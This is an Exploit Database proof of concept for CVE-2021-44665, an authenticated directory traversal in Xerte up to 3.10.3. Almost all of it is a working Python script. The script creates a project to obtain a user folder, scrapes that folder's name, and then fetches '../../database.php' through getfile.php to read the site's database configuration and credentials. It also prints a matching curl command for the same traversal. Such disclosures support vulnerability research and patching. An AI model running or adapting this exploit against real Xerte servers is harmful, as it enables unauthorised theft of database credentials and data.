Xerte 3.10.3 – Directory Traversal (Authenticated)

• Exploit Database
• 19 阅读

• 作者： Rik Lutz
  日期： 2022-03-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50794/

• # Exploit Title: Xerte 3.10.3 - Directory Traversal (Authenticated)
  # Date: 05/03/2021
  # Exploit Author: Rik Lutz
  # Vendor Homepage: https://xerte.org.uk
  # Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.9.zip
  # Version: up until 3.10.3
  # Tested on: Windows 10 XAMP
  # CVE : CVE-2021-44665
  
  # This PoC assumes guest login is enabled. Vulnerable url:
  # https://<host>/getfile.php?file=<user-direcotry>/../../database.php
  # You can find a userfiles-directory by creating a project and browsing the media menu.
  # Create new project from template -> visit "Properties" (! symbol) -> Media and Quota -> Click file to download
  # The userfiles-direcotry will be noted in the URL and/or when you download a file.
  # They look like: <numbers>-<username>-<templatename>
  
  import requests
  import re
  
  xerte_base_url = "http://127.0.0.1"
  file_to_grab = "/../../database.php"
  php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here.
  
  with requests.Session() as session:
  # Get a PHP session ID
  if not php_session_id:
  session.get(xerte_base_url) 
  else:
  session.cookies.set("PHPSESSID", php_session_id)
  
  # Use a default template
  data = {
  'tutorialid': 'Nottingham',
  'templatename': 'Nottingham',
  'tutorialname': 'exploit',
  'folder_id': ''
  }
  
  # Create a new project in order to create a user-folder
  template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)
  
  # Find template ID
  data = {
  'template_id': re.findall('(\d+)', template_id.text)[0]
  }
  
  # Find the created user-direcotry:
  user_direcotry = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)
  user_direcotry = re.findall('USER-FILES\/([0-9]+-[a-z0-9]+-[a-zA-Z0-9_]+)', user_direcotry.text)[0]
  
  # Grab file
  result = session.get(xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)
  print(result.text)
  print("|-- Used Variables: --|")
  print("PHP Session ID: " + session.cookies.get_dict()['PHPSESSID'])
  print("user direcotry: " + user_direcotry)
  print("Curl example:")
  print('curl --cookie "PHPSESSID=' + session.cookies.get_dict()['PHPSESSID'] + '" ' + xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)